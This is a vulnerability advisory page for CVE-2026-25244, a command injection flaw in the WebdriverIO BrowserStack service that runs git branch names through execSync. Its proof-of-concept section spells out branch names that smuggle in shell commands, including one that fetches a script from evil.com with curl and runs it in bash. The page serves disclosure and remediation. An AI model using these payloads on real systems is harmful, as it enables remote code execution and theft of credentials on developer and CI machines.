Skip to main content

@wdio/browserstack-service CVE-2026-25244

| EUVDEUVD-2026-30805 CRITICAL
OS Command Injection (CWE-78)
2026-05-11 https://github.com/webdriverio/webdriverio GHSA-5c46-x3qw-q7j7
9.8
CVSS 3.1 · Vendor: https://github.com/webdriverio/webdriverio
Share

Severity by source

Vendor (https://github.com/webdriverio/webdriverio) PRIMARY
9.8 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Red Hat
8.0 HIGH
qualitative

Primary rating from Vendor (https://github.com/webdriverio/webdriverio).

CVSS VectorVendor: https://github.com/webdriverio/webdriverio

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
May 11, 2026 - 18:16 vuln.today
Analysis Generated
May 11, 2026 - 18:16 vuln.today
CVE Published
May 11, 2026 - 17:53 nvd
CRITICAL 9.8

DescriptionCVE.org

Summary

A command injection vulnerability exists in @wdio/browserstack-service that allows remote code execution (RCE) when processing git branch names in test orchestration. An attacker can exploit this by providing a malicious git repository with a branch name containing shell command injection payloads.

Details

_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._

Vulnerable Code

File: https://github.com/webdriverio/webdriverio/blob/ea0e3e00288abced4c739ff9e46c46977b7cdbd2/packages/wdio-browserstack-service/src/testorchestration/helpers.ts#L204

Root Cause

User-controlled git branch names are directly interpolated into execSync() calls without sanitization. Git allows branch names to contain special characters ,that can be used for command injection. Git allows to create these branches.

git checkout -b "main;touch\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED"
git checkout -b "main;rm\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED"
git checkout -b "main;curl\${IFS}evil.com/evil.sh\${IFS}>/tmp/evil.sh;bash\${IFS}/tmp/evil.sh;echo\${IFS}PWNED"

Attack Vector

  1. Attacker creates a malicious git repository with a branch name containing command injection payload
  2. Attacker configures WebdriverIO to use this repository via testOrchestrationOptions.runSmartSelection.source. if source is not provided it takes current directory as source.
  3. When getGitMetadataForAISelection() executes, it extracts the malicious branch name
  4. Branch name is interpolated into shell commands without sanitization
  5. Shell interprets special characters and executes attacker's commands

PoC

Step 1: Create Malicious Repository Branch

git checkout -b "main;touch\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED"

Step 2: Configure WebdriverIO

javascript
// wdio.conf.js
export const config = {
    services: [
        ['browserstack', {
            user: process.env.BROWSERSTACK_USERNAME,
            key: process.env.BROWSERSTACK_ACCESS_KEY,
            testOrchestrationOptions: {
                runSmartSelection: {
                    enabled: true,
                    source: ['/tmp/malicious-repo']  // ⚠️ Points to malicious repo, without "source" field, it runs in the current directory.
                }
            }
        }]
    ],
    // ... rest of config
}

Step 3: Run Tests

bash
npm run wdio

Step 4: Verify RCE

bash
# Check if file was created (proof of RCE)
ls -la /tmp/pwned.txt

Impact

  • Remote Code Execution on CI/CD servers or developer machines
  • Information Disclosure (environment variables, secrets, credentials)
  • Data Exfiltration (source code, SSH keys, configuration files)
  • System Compromise (backdoor installation, lateral movement)
  • Supply Chain Attack (modify build artifacts)

AnalysisAI

Command injection in @wdio/browserstack-service allows arbitrary code execution when malicious git branch names are processed during test orchestration. Attackers can craft repository branch names containing shell metacharacters that execute when the BrowserStack service's getGitMetadataForAISelection() function unsafely passes branch names to Node.js execSync() calls. Exploitation requires configuring WebdriverIO to point at an attacker-controlled repository or cloning into a directory where tests run, making this primarily a supply chain and CI/CD pipeline risk. Publicly available exploit code exists with working proof-of-concept demonstrating file creation via injected commands. Vendor-released patch available in version 9.24.0 per GitHub advisory GHSA-5c46-x3qw-q7j7. CVSS 9.8 (Critical) reflects maximum impact, but real-world exploitation requires either social engineering developers to use malicious repos or compromising upstream dependencies - exploitation probability depends heavily on organizational code review and repository vetting practices.

Technical ContextAI

The vulnerability exists in the WebdriverIO BrowserStack service NPM package (@wdio/browserstack-service), specifically in the test orchestration helpers module at helpers.ts line 204. WebdriverIO is a popular browser automation framework for Node.js that integrates with BrowserStack cloud testing services. The vulnerable code implements an AI-driven smart test selection feature (runSmartSelection) that extracts git metadata to optimize which tests to run. The root cause is CWE-78 (OS Command Injection): the getGitMetadataForAISelection() function calls Node.js child_process.execSync() with string interpolation of unsanitized git branch names directly into shell commands. Git permits branch names to contain special shell metacharacters including semicolons, backticks, dollar signs, and variable expansion syntax like ${IFS} (Internal Field Separator used to bypass space restrictions in injection payloads). When execSync processes these crafted branch names, the shell interprets the metacharacters as command separators or substitutions, executing attacker-controlled commands in the context of the Node.js process. The CPE identifier pkg:npm/@wdio_browserstack-service confirms all versions through 9.23.2 are vulnerable. This reflects a common anti-pattern in Node.js applications where developers assume git metadata is trusted input, failing to apply input validation before shell invocation.

RemediationAI

Upgrade @wdio/browserstack-service to version 9.24.0 or later immediately, as confirmed by the vendor release at https://github.com/webdriverio/webdriverio/releases/tag/v9.24.0 and security advisory https://github.com/webdriverio/webdriverio/security/advisories/GHSA-5c46-x3qw-q7j7. Update package dependencies using 'npm update @wdio/browserstack-service@latest' or modify package.json to specify version constraint '>=9.24.0' and run 'npm install'. For organizations unable to immediately patch, implement the following compensating controls with awareness of their limitations: disable the vulnerable feature by removing or setting testOrchestrationOptions.runSmartSelection.enabled to false in wdio.conf.js, which eliminates AI-driven test selection benefits but prevents exploitation; implement strict git repository allowlisting in CI/CD configurations to prevent tests from running against unapproved repositories, though this requires comprehensive inventory of legitimate test sources; apply mandatory code review for any wdio.conf.js changes that modify testOrchestrationOptions.runSmartSelection.source paths, recognizing that determined attackers may still bypass review through compromised dependencies; restrict CI/CD pipeline permissions to prevent arbitrary repository cloning, though this may break legitimate workflows requiring dynamic repository access. None of these workarounds fully mitigate the vulnerability - upgrading to 9.24.0 is the only complete remediation. Organizations should audit CI/CD logs for suspicious git branch names containing shell metacharacters (semicolons, backticks, ${IFS}, curl commands) as potential indicators of exploitation attempts.

CVE-2024-55591 CRITICAL POC
9.8 Jan 14

FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote

CVE-2014-7205 CRITICAL POC
10.0 Oct 08

Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t

CVE-2025-59528 CRITICAL POC
10.0 Sep 22

Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete

CVE-2017-14849 HIGH POC
7.5 Sep 28

Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc

CVE-2017-5941 CRITICAL POC
9.8 Feb 09

An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner

CVE-2014-3744 HIGH POC
7.5 Oct 23

Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi

CVE-2014-9566 HIGH POC
7.5 Mar 10

Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin

CVE-2013-4660 MEDIUM POC
6.8 Jun 28

The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic

CVE-2015-5688 MEDIUM POC
5.0 Sep 04

Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read

CVE-2026-45321 CRITICAL POC
9.6 May 12

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio

CVE-2014-7192 CRITICAL POC
10.0 Dec 11

Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat

CVE-2013-4450 MEDIUM POC
5.0 Oct 21

The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se

Vendor StatusVendor

Share

CVE-2026-25244 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy